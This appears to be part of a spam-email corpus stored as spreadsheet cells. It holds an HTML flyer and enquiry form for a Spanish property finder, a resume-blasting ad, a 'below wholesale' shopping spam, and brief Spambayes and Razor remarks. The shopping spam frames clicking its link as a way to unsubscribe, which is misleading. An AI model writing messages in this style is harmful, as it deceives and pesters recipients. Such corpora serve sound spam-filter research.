       style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; TEXT-ALIGN: center" 
       align=3Dcenter&gt;&lt;FONT face=3DArial&gt;&lt;SPAN 
       style=3D"FONT-SIZE: 17pt"&gt;&lt;/SPAN&gt;&lt;/FONT&gt;&amp;nbsp;&lt;/P&gt;
       &lt;P class=3DMsoBodyText2 style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px" 
       align=3Dcenter&gt;&lt;FONT style=3D"FONT-SIZE: 17pt" face=3DArial&gt;Just think of how 
       much time and effort that would save you!&lt;/FONT&gt;&lt;/P&gt;
       &lt;P class=3DMsoBodyText2 style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px"&gt;&lt;FONT 
       style=3D"FONT-SIZE: 17pt" face=3DArial&gt;&lt;/FONT&gt;&amp;nbsp;&lt;/P&gt;
       &lt;P class=3DMsoNormal 
       style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; TEXT-ALIGN: center" 
       align=3Dcenter&gt;&lt;FONT face=3DArial&gt;&lt;SPAN 
       style=3D"FONT-SIZE: 17pt"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;B&gt;&lt;SPAN 
       style=3D"FONT-SIZE: 17pt"&gt;&lt;FONT face=3D"Arial Black" color=3D#0000ff&gt;Property 
       finders Spain&lt;/FONT&gt;&lt;/SPAN&gt;&lt;/B&gt;&lt;SPAN style=3D"FONT-SIZE: 17pt"&gt; 
       &lt;/SPAN&gt;&lt;/FONT&gt;&lt;/P&gt;
       &lt;P class=3DMsoNormal 
       style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; TEXT-ALIGN: center" 
       align=3Dcenter&gt;&lt;FONT face=3DArial color=3D#0000ff&gt;&lt;SPAN 
       style=3D"FONT-SIZE: 17pt"&gt;can do just that!&lt;/SPAN&gt;&lt;/FONT&gt;&lt;/P&gt;
       &lt;P class=3DMsoNormal 
       style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; TEXT-ALIGN: center" 
       align=3Dcenter&gt;&lt;FONT face=3DArial&gt;&lt;SPAN 
       style=3D"FONT-SIZE: 17pt"&gt;&lt;/SPAN&gt;&lt;/FONT&gt;&amp;nbsp;&lt;/P&gt;
       &lt;P class=3DMsoNormal 
       style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; TEXT-ALIGN: center" 
       align=3Dcenter&gt;&lt;FONT face=3DArial&gt;&lt;SPAN style=3D"FONT-SIZE: 17pt"&gt;We are here in 
       Spain and have a many ways of looking for property that has just arrived 
       on the market, &lt;I&gt;even looking in the local papers!&lt;/I&gt; &lt;/SPAN&gt;&lt;/FONT&gt;&lt;/P&gt;
       &lt;P class=3DMsoNormal 
       style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; TEXT-ALIGN: center" 
       align=3Dcenter&gt;&lt;FONT face=3DArial&gt;&lt;SPAN 
       style=3D"FONT-SIZE: 17pt"&gt;&lt;/SPAN&gt;&lt;/FONT&gt;&amp;nbsp;&lt;/P&gt;
       &lt;P class=3DMsoNormal 
       style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; TEXT-ALIGN: center" 
       align=3Dcenter&gt;&lt;FONT face=3DArial color=3D#0000ff&gt;&lt;I&gt;&lt;SPAN 
       style=3D"FONT-SIZE: 17pt"&gt;So while others are chasing properties or new 
       projects that are no longer for sale you can be viewing property that has 
       just arrived on the market!&lt;/SPAN&gt;&lt;/I&gt;&lt;/FONT&gt;&lt;/P&gt;
       &lt;P class=3DMsoNormal 
       style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; TEXT-ALIGN: center" 
       align=3Dcenter&gt;&lt;FONT face=3DArial&gt;&lt;SPAN 
       style=3D"FONT-SIZE: 17pt"&gt;&lt;/SPAN&gt;&lt;/FONT&gt;&amp;nbsp;&lt;/P&gt;
       &lt;P class=3DMsoBodyText3 style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px" 
       align=3Dcenter&gt;&lt;FONT style=3D"FONT-SIZE: 17pt" face=3DArial&gt;&lt;B&gt;Simply fill in 
       the form below and press the send button and we will do all of the hard 
       work for you. &lt;/B&gt;&lt;/FONT&gt;&lt;/P&gt;
       &lt;P class=3DMsoBodyText3 style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px" 
       align=3Dcenter&gt;&lt;FONT style=3D"FONT-SIZE: 17pt" 
       face=3DArial&gt;&lt;B&gt;&lt;/B&gt;&lt;/FONT&gt;&amp;nbsp;&lt;/P&gt;
       &lt;P style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px" align=3Dcenter&gt;&lt;SPAN 
       lang=3DEN-GB style=3D"FONT-SIZE: 17pt; FONT-FAMILY: Arial"&gt;Once we receive 
       your requirements we will immediately begin looking for current properties 
       just right for you.&lt;/SPAN&gt;&lt;/P&gt;
       &lt;P style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px"&gt;&amp;nbsp;&lt;/P&gt;&lt;!--webbot BOT=3D"GeneratedScript" PREVIEW=3D" " startspan --&gt;
       &lt;SCRIPT language=3DJavaScript type=3Dtext/javascript&gt;&lt;!--
 function FrontPage_Form1_Validator(theForm)
 {
   var checkOK =3D "0123456789-,.";
   var checkStr =3D theForm.Price_range.value;
   var allValid =3D true;
   var validGroups =3D true;
   var decPoints =3D 0;
   var allNum =3D "";
   for (i =3D 0;  i &lt; checkStr.length;  i++)
   {
     ch =3D checkStr.charAt(i);
     for (j =3D 0;  j &lt; checkOK.length;  j++)
       if (ch =3D=3D checkOK.charAt(j))
         break;
     if (j =3D=3D checkOK.length)
     {
       allValid =3D false;
       break;
     }
     if (ch =3D=3D ",")
     {
       allNum +=3D ".";
       decPoints++;
     }
     else if (ch =3D=3D "." &amp;&amp; decPoints !=3D 0)
     {
       validGroups =3D false;
       break;
     }
     else if (ch !=3D ".")
       allNum +=3D ch;
   }
   if (!allValid)
   {
     alert("Please enter only digit characters in the \"Price_range\" field.");
     theForm.Price_range.focus();
     return (false);
   }
   if (decPoints &gt; 1 || !validGroups)
   {
     alert("Please enter a valid number in the \"Price_range\" field.");
     theForm.Price_range.focus();
     return (false);
   }
   var checkOK =3D "0123456789-";
   var checkStr =3D theForm.country_code.value;
   var allValid =3D true;
   var validGroups =3D true;
   var decPoints =3D 0;
   var allNum =3D "";
   for (i =3D 0;  i &lt; checkStr.length;  i++)
   {
     ch =3D checkStr.charAt(i);
     for (j =3D 0;  j &lt; checkOK.length;  j++)
       if (ch =3D=3D checkOK.charAt(j))
         break;
     if (j =3D=3D checkOK.length)
     {
       allValid =3D false;
       break;
     }
     allNum +=3D ch;
   }
   if (!allValid)
   {
     alert("Please enter only digit characters in the \"country_code\" field.");
     theForm.country_code.focus();
     return (false);
   }
   return (true);
 }
 //--&gt;&lt;/SCRIPT&gt;
 &lt;!--webbot BOT=3D"GeneratedScript" endspan --&gt;
       &lt;FORM language=3DJavaScript name=3DFrontPage_Form1 
       onsubmit=3D"return FrontPage_Form1_Validator(this)" 
       action=3Dhttp://www.secure-siteserver.com/cgi-bin/mailform.pl method=3Dpost&gt;
       &lt;TABLE id=3DAutoNumber4 style=3D"BORDER-COLLAPSE: collapse" 
       borderColor=3D#111111 cellSpacing=3D0 cellPadding=3D0 width=3D"100%" border=3D1&gt;
         &lt;TBODY&gt;
         &lt;TR&gt;
           &lt;TD width=3D"100%"&gt;
             &lt;P style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px" align=3Dcenter&gt;&lt;B&gt;&lt;SPAN 
             style=3D"FONT-SIZE: 22pt"&gt;Property finders 
         Form&lt;/SPAN&gt;&lt;/B&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
       &lt;TABLE id=3DAutoNumber5 style=3D"BORDER-COLLAPSE: collapse" 
       borderColor=3D#111111 cellSpacing=3D0 cellPadding=3D0 border=3D0&gt;&lt;INPUT 
         type=3Dhidden value=3D1 name=3Dprint_blank_fields&gt; &lt;INPUT type=3Dhidden 
         value=3DREMOTE_HOST,REMOTE_ADDR name=3Denv_report&gt; &lt;INPUT type=3Dhidden 
         value=3Dgraham@mail.costasolproperty.com name=3Drecipient&gt; &lt;INPUT 
         type=3Dhidden value=3Dhttp://www.secure-siteserver.com/flyer/thank_you.htm 
         name=3Dredirect&gt; 
         &lt;TBODY&gt;
         &lt;TR&gt;
           &lt;TD width=3D"39%"&gt;
             &lt;P style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px"&gt;&amp;nbsp;&lt;/P&gt;&lt;/TD&gt;
           &lt;TD width=3D"61%"&gt;
             &lt;P style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px"&gt;&amp;nbsp;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD width=3D"39%"&gt;
             &lt;P style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px"&gt;&lt;FONT 
             face=3DArial&gt;&lt;SPAN style=3D"FONT-SIZE: 13pt"&gt;Property 
             Type&lt;/SPAN&gt;&lt;/FONT&gt;&lt;/P&gt;&lt;/TD&gt;
           &lt;TD width=3D"61%"&gt;
             &lt;P style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px"&gt;&lt;SELECT size=3D1 
             name=3DType_of_property&gt; &lt;OPTION selected&gt;Villa&lt;/OPTION&gt; 
               &lt;OPTION&gt;Apartment&lt;/OPTION&gt; &lt;OPTION&gt;Town House&lt;/OPTION&gt; &lt;OPTION&gt;New 
               building projects&lt;/OPTION&gt; &lt;OPTION&gt;Plot of 
           Land&lt;/OPTION&gt;&lt;/SELECT&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD width=3D"39%"&gt;
             &lt;P style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px"&gt;&lt;FONT 
             face=3DArial&gt;&lt;SPAN style=3D"FONT-SIZE: 13pt"&gt;Number of 
             bedrooms&lt;/SPAN&gt;&lt;/FONT&gt;&lt;/P&gt;&lt;/TD&gt;
           &lt;TD width=3D"61%"&gt;
             &lt;P style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px"&gt;&lt;SELECT multiple 
             size=3D1 name=3DHow_many_bedrooms&gt; &lt;OPTION&gt;1&lt;/OPTION&gt; 
               &lt;OPTION&gt;2&lt;/OPTION&gt; &lt;OPTION&gt;3&lt;/OPTION&gt; &lt;OPTION&gt;4&lt;/OPTION&gt; 
               &lt;OPTION&gt;5&lt;/OPTION&gt; &lt;OPTION&gt;6&lt;/OPTION&gt;&lt;/SELECT&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD width=3D"39%"&gt;
             &lt;P style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px"&gt;&lt;FONT 
             face=3DArial&gt;&lt;SPAN 
           style=3D"FONT-SIZE: 13pt"&gt;Location&lt;/SPAN&gt;&lt;/FONT&gt;&lt;/P&gt;&lt;/TD&gt;
           &lt;TD width=3D"61%"&gt;
             &lt;P style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px"&gt;&lt;INPUT 
             name=3DLocation&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD width=3D"39%"&gt;
             &lt;P style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px"&gt;&lt;SPAN 
             style=3D"FONT-SIZE: 13pt; FONT-FAMILY: Arial"&gt;Do you want a Sea 
             View?&lt;/SPAN&gt;&lt;/P&gt;&lt;/TD&gt;
           &lt;TD width=3D"61%"&gt;
             &lt;P style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px"&gt;&lt;SELECT size=3D1 
             name=3Dsea_view&gt; &lt;OPTION selected&gt;Yes&lt;/OPTION&gt; &lt;OPTION&gt;No&lt;/OPTION&gt; 
               &lt;OPTION&gt;Don`t care&lt;/OPTION&gt;&lt;/SELECT&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD width=3D"39%"&gt;
             &lt;P style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px"&gt;&lt;FONT 
             face=3DArial&gt;&lt;SPAN style=3D"FONT-SIZE: 13pt"&gt;Mountain 
             View&lt;/SPAN&gt;&lt;/FONT&gt;&lt;/P&gt;&lt;/TD&gt;
           &lt;TD width=3D"61%"&gt;
             &lt;P style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px"&gt;&lt;SELECT size=3D1 
             name=3DMountain_view&gt; &lt;OPTION selected&gt;Yes&lt;/OPTION&gt; 
               &lt;OPTION&gt;No&lt;/OPTION&gt; &lt;OPTION&gt;Don`t care&lt;/OPTION&gt;&lt;/SELECT&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD width=3D"39%"&gt;
             &lt;P style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px"&gt;&lt;FONT 
             face=3DArial&gt;&lt;SPAN style=3D"FONT-SIZE: 13pt"&gt;A property in the 
             country&lt;/SPAN&gt;&lt;/FONT&gt;&lt;/P&gt;&lt;/TD&gt;
           &lt;TD width=3D"61%"&gt;
             &lt;P style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px"&gt;&lt;INPUT type=3Dcheckbox 
             value=3DON name=3DC1&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD width=3D"39%"&gt;
             &lt;P style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px"&gt;&lt;SPAN 
             style=3D"FONT-SIZE: 13pt; FONT-FAMILY: Arial"&gt;A Property in or near a 
             city&lt;/SPAN&gt;&lt;/P&gt;&lt;/TD&gt;
           &lt;TD width=3D"61%"&gt;
             &lt;P style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px"&gt;&lt;INPUT type=3Dcheckbox 
             value=3DON name=3DC2&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD width=3D"39%"&gt;
             &lt;P style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px"&gt;&lt;FONT 
             face=3DArial&gt;&lt;SPAN style=3D"FONT-SIZE: 13pt"&gt;Pool Yes, 
             No&lt;/SPAN&gt;&lt;/FONT&gt;&lt;/P&gt;&lt;/TD&gt;
           &lt;TD width=3D"61%"&gt;
             &lt;P style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px"&gt;&lt;SELECT size=3D1 
             name=3DPool&gt; &lt;OPTION selected&gt;Yes&lt;/OPTION&gt; &lt;OPTION&gt;No&lt;/OPTION&gt; 
               &lt;OPTION&gt;Don`t care&lt;/OPTION&gt;&lt;/SELECT&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD width=3D"39%"&gt;
             &lt;P style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px"&gt;&lt;FONT 
             face=3DArial&gt;&lt;SPAN style=3D"FONT-SIZE: 13pt"&gt;Price 
             Range&lt;/SPAN&gt;&lt;/FONT&gt;&lt;/P&gt;&lt;/TD&gt;
           &lt;TD width=3D"61%"&gt;
             &lt;P style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px"&gt;&lt;!--webbot bot=3D"Validation" s-data-type=3D"Number" s-number-separators=3D".," --&gt;&lt;INPUT 
             name=3DPrice_range&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD width=3D"39%"&gt;
             &lt;P style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px"&gt;&lt;FONT 
             face=3DArial&gt;&lt;SPAN style=3D"FONT-SIZE: 13pt"&gt;Are you planning to come 
             &lt;/SPAN&gt;&lt;/FONT&gt;&lt;/P&gt;
             &lt;P style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px"&gt;&lt;FONT 
             face=3DArial&gt;&lt;SPAN style=3D"FONT-SIZE: 13pt"&gt;to Spain in the next three 
             months Yes, No?&lt;/SPAN&gt;&lt;/FONT&gt;&lt;/P&gt;&lt;/TD&gt;
           &lt;TD width=3D"61%"&gt;
             &lt;P style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px"&gt;&lt;SELECT size=3D1 
             name=3DPlaning_to_come_over&gt; &lt;OPTION selected&gt;Yes&lt;/OPTION&gt; 
               &lt;OPTION&gt;No&lt;/OPTION&gt;&lt;/SELECT&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD width=3D"39%"&gt;
             &lt;P style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px"&gt;&lt;FONT 
             face=3DArial&gt;&lt;SPAN style=3D"FONT-SIZE: 13pt"&gt;Name&lt;/SPAN&gt;&lt;/FONT&gt;&lt;/P&gt;&lt;/TD&gt;
           &lt;TD width=3D"61%"&gt;
             &lt;P style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px"&gt;&lt;INPUT 
           name=3DName&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD width=3D"39%"&gt;
             &lt;P style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px"&gt;&lt;FONT 
             face=3DArial&gt;&lt;SPAN style=3D"FONT-SIZE: 13pt"&gt;E mail 
             address&lt;/SPAN&gt;&lt;/FONT&gt;&lt;/P&gt;&lt;/TD&gt;
           &lt;TD width=3D"61%"&gt;
             &lt;P style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px"&gt;&lt;INPUT 
           name=3Demail&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD width=3D"39%"&gt;
             &lt;P style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px"&gt;&lt;FONT 
             face=3DArial&gt;&lt;SPAN style=3D"FONT-SIZE: 13pt"&gt;Telephone 
             Number&lt;/SPAN&gt;&lt;/FONT&gt;&lt;/P&gt;&lt;/TD&gt;
           &lt;TD width=3D"61%"&gt;
             &lt;P style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px"&gt;&lt;INPUT 
             name=3Dtelephone&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD width=3D"39%"&gt;
             &lt;P style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px"&gt;&lt;FONT 
             style=3D"FONT-SIZE: 13pt" face=3DArial&gt;Country Code&lt;/FONT&gt;&lt;/P&gt;&lt;/TD&gt;
           &lt;TD width=3D"61%"&gt;
             &lt;P style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px"&gt;&lt;!--webbot bot=3D"Validation" s-data-type=3D"Integer" s-number-separators=3D"x" --&gt;&lt;INPUT 
             size=3D4 name=3Dcountry_code&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD width=3D"39%"&gt;
             &lt;P style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px"&gt;&amp;nbsp;&lt;/P&gt;&lt;/TD&gt;
           &lt;TD width=3D"61%"&gt;
             &lt;P 
         style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px"&gt;&amp;nbsp;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
       &lt;P style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px"&gt;&amp;nbsp;&lt;/P&gt;
       &lt;P style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px" align=3Dcenter&gt;&lt;INPUT type=3Dsubmit value=3D"Please click here to proceed &gt;&gt;" name=3DB1&gt;&lt;INPUT type=3Dreset value=3DReset name=3DB2&gt;&lt;/P&gt;&lt;/FORM&gt;
       &lt;H1 style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px"&gt;&lt;IMG height=3D52 
       src=3D"http://www.secure-siteserver.com/flyer/logo-copy.jpg" width=3D425 
       border=3D0&gt;&lt;/H1&gt;
       &lt;H2 style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px"&gt;&lt;FONT face=3DArial&gt;&lt;SPAN 
       style=3D"FONT-SIZE: 15pt"&gt;Let us find a property for 
     you!&lt;/SPAN&gt;&lt;/FONT&gt;&lt;/H2&gt;&lt;/TD&gt;
     &lt;TD width=3D"23%" height=3D36&gt;
       &lt;TABLE id=3DAutoNumber6 style=3D"BORDER-COLLAPSE: collapse" 
       borderColor=3D#111111 height=3D8 cellSpacing=3D0 cellPadding=3D0 width=3D"100%" 
       border=3D0&gt;
         &lt;TBODY&gt;
         &lt;TR&gt;
           &lt;TD bgColor=3D#0066cc height=3D8&gt;
             &lt;P align=3Dcenter&gt;&amp;nbsp;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
       &lt;P style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px"&gt;&lt;IMG height=3D509 
       src=3D"http://www.secure-siteserver.com/flyer/vertical_pic.jpg" width=3D170 
       border=3D0&gt;&lt;/P&gt;
       &lt;P style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px"&gt;&lt;IMG height=3D509 
       src=3D"http://www.secure-siteserver.com/flyer/vertical_pic.jpg" width=3D170 
       border=3D0&gt;&lt;/P&gt;
       &lt;P style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px"&gt;&lt;IMG height=3D509 
       src=3D"http://www.secure-siteserver.com/flyer/vertical_pic.jpg" width=3D170 
       border=3D0&gt;&lt;/P&gt;
       &lt;TABLE id=3DAutoNumber7 style=3D"BORDER-COLLAPSE: collapse" 
       borderColor=3D#111111 height=3D97 cellSpacing=3D0 cellPadding=3D0 width=3D"100%" 
       border=3D0&gt;
         &lt;TBODY&gt;
         &lt;TR&gt;
           &lt;TD width=3D"100%" bgColor=3D#0066cc 
     height=3D97&gt;&amp;nbsp;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/TD&gt;
     &lt;TD width=3D"2%" bgColor=3D#0066cc height=3D36&gt;
       &lt;P style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px"&gt;&amp;nbsp;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;
   &lt;TR&gt;
     &lt;TD width=3D"3%" bgColor=3D#0066cc height=3D19&gt;
       &lt;P style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px"&gt;&amp;nbsp;&lt;/P&gt;&lt;/TD&gt;
     &lt;TD width=3D"74%" bgColor=3D#0066cc height=3D19&gt;
       &lt;P style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px"&gt;&amp;nbsp;&lt;/P&gt;&lt;/TD&gt;
     &lt;TD width=3D"23%" bgColor=3D#0066cc height=3D19&gt;
       &lt;P style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px"&gt;&amp;nbsp;&lt;/P&gt;&lt;/TD&gt;
     &lt;TD width=3D"2%" bgColor=3D#0066cc height=3D19&gt;
       &lt;P 
 style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px"&gt;&amp;nbsp;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
 &lt;/BODY&gt;
 &lt;/html&gt;
 ------_NextPart_4756979720--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Proven way to get a job....
</t>
  </si>
  <si>
    <t xml:space="preserve">
 ------ack1234
 Content-Type: multipart/alternative; boundary="----alt_border_1"
 ------alt_border_1
 Content-Type: text/plain; charset="ISO-8859-1"
 Content-Transfer-Encoding: quoted-printable
 Greetings!
 One of the best ways land a new job quickly, especially in a 
 tight job market, is to email your resume to as many 
 recruiters as possible that work in your area and specialize
 in people with your skills.
 However, finding these recruiters and sending them each an 
 email can be an enormous amount of work. Many have 
 successfully used ResumeMailman.com to email their resume to
 1000's of these recruiters instantly!
 This service has exceptional recruiter targeting, long 
 standing experience, and a great reputation with a huge group
 of quality recruiters.
 ResumeMailman network recruiters have connections to tons
 of unadvertised jobs. Your resume is instantly emailed to 1000's
 of recruiters in your selected areas, specializing in your 
 selected skill sets.
 The whole process can be completed in about 10 minutes flat!
 You can even get a free confidential email address with your
 order AND receive a contact list of all the recruiters who
 received your resume!
 Just check out: 
 http://www.allexecs.com/offers/deal/02-07-17-1.html - it's easy.
 Since 1998 ResumeMailman.com's resume distribution engine has
 helped tens of 1000's of people distribute their resume and 
 get jobs.  Why not let them do the same for you.
 Sincerely,
 Steve Adler
 steveadler@allexecs.com
 =========================================================
 The staff of AllExecs.com have years of recruiting 
 experience and may from time to time send you a review of 
 career tips and tools that have helped others in their job 
 search. If you'd rather not receive these reviews go to
 http://www.allexecs.com/unsubscribe
 =========================================================
 ------alt_border_1
 Content-Type: text/html; charset="ISO-8859-1"
 &lt;html&gt;
 &lt;head&gt;
 &lt;meta http-equiv="Content-Type" content="text/html; charset=windows-1252"&gt;
 &lt;title&gt;Allexecs.com&lt;/title&gt;
 &lt;/head&gt;
 &lt;body&gt;
 &lt;p&gt;&lt;font face="Courier New" size="2"&gt;Greetings!&lt;br&gt;
 &lt;br&gt;
 One of the best ways land a new job quickly, especially in a&lt;br&gt;
 tight job market, is to email your resume to as many&lt;br&gt;
 recruiters as possible that work in your area and specialize&lt;br&gt;
 in people with your skills.&lt;br&gt;
 &lt;br&gt;
 However, finding these recruiters and sending them each an&lt;br&gt;
 email can be an enormous amount of work. Many have&lt;br&gt;
 successfully used ResumeMailman.com to email their resume to&lt;br&gt;
 1000's of these recruiters instantly!&lt;br&gt;
 &lt;br&gt;
 This service has exceptional recruiter targeting, long&amp;nbsp;&lt;br&gt;
 standing experience, and a great reputation with a huge group&lt;br&gt;
 of quality recruiters.&lt;br&gt;
 &lt;br&gt;
 ResumeMailman network recruiters have connections to tons&lt;br&gt;
 of unadvertised jobs. Your resume is instantly emailed to 1000's&lt;br&gt;
 of recruiters in your selected areas, specializing in your&lt;br&gt;
 selected skill sets.&lt;br&gt;
 &lt;br&gt;
 The whole process can be completed in about 10 minutes flat!&lt;br&gt;
 You can even get a free confidential email address with your&lt;br&gt;
 order AND receive a contact list of all the recruiters who&lt;br&gt;
 received your resume!&lt;br&gt;
 &lt;br&gt;
 Just check out &lt;a href="http://www.allexecs.com/offers/deal/02-07-17-2.html"&gt; http://www.resumemailman.com&lt;/a&gt; - it's easy.&lt;br&gt;
 &lt;br&gt;
 Since 1998 ResumeMailman.com's resume distribution engine has&lt;br&gt;
 helped tens of 1000's of people distribute their resume and&lt;br&gt;
 get jobs.  Why not let them do the same for you.&lt;br&gt;
 &lt;br&gt;
 Sincerely,&lt;br&gt;
 &lt;br&gt;
 &lt;br&gt;
 Steve Adler&lt;br&gt;
 steveadler@allexecs.com&lt;br&gt;
 &lt;br&gt;
 &lt;br&gt;
 =========================================================&lt;br&gt;
 &lt;br&gt;
 The staff of AllExecs.com have years of recruiting&amp;nbsp;&lt;br&gt;
 experience and may from time to time send you a review of&lt;br&gt;
 career tips and tools that have helped others in their job&lt;br&gt;
 search. If you'd rather not receive these reviews go to&lt;br&gt;
 &lt;a href="http://www.allexecs.com/unsubscribe"&gt;http://www.allexecs.com/unsubscribe&lt;/a&gt;&lt;br&gt;
 &lt;img src="http://www.allexecs.com/offers/images/02-07-17-2.gif"&gt;
 &lt;br&gt;
 =========================================================&lt;/font&gt;&lt;/p&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 ------alt_border_1--
 ------ack1234--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Below Wholesale Prices on Name Brand Products
</t>
  </si>
  <si>
    <t xml:space="preserve">Friend, We have recently been introduced to an amazing shopping experience that has all the products we look for at phenomenal savings, actually below Wholesale!!! In the next few days, we'll be introducing the e-world to this unique savings oriented shopping website. We need to be sure that you are open to reviewing this information. If you are not open, here's what to do... Nothing! You will be automatically unsubscribed if you do not click on the link below. &lt;http://www.netmarkpro.com/bbpr/lc1&gt; We are cleaning these databases now...in preparation for a major campaign for our new shopping website. Our marketing campaign should only go out to those that are sincerely interested...If you do not wish to be contacted, please accept our thanks and use the unsubscribe link below, now. Our company does not promote or approve of unsolicited email broadcasting (spam)... Therefore; we have designed this system to clean our databases of individuals that wish not to receive announcements of this type, offering savings and the opportunity to buy products at a substantially reduced price. Please remove your email address if you do not wish to receive further communications. It is our hope that you will keep our lines of communication open. The first introduction of this shopper's paradise will be within 48 hours of this message. We hope that you will take the opportunity to review it. No action is required if you do not wish to remain on our communication list. You will be automatically unsubscribed. Again, we appreciate your assistance and hope that you appreciate our efforts to clean the databases and be spam free. Thank you again for your decision to accept our message or to unsubscribe, whichever your choice was. ******************************************************* For those who are still with us, we commit to sending you only valuable information on substantial savings for shopping online. 
 Pat
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [Spambayes] speed
</t>
  </si>
  <si>
    <t xml:space="preserve">
 If the frequency of my laptop's disk chirps are any indication, I'd say
 hammie is about 3-5x faster than SpamAssassin.
 Skip
</t>
  </si>
  <si>
    <t xml:space="preserve">If I specify -rs on razor-check and point to honor then it checks fine.
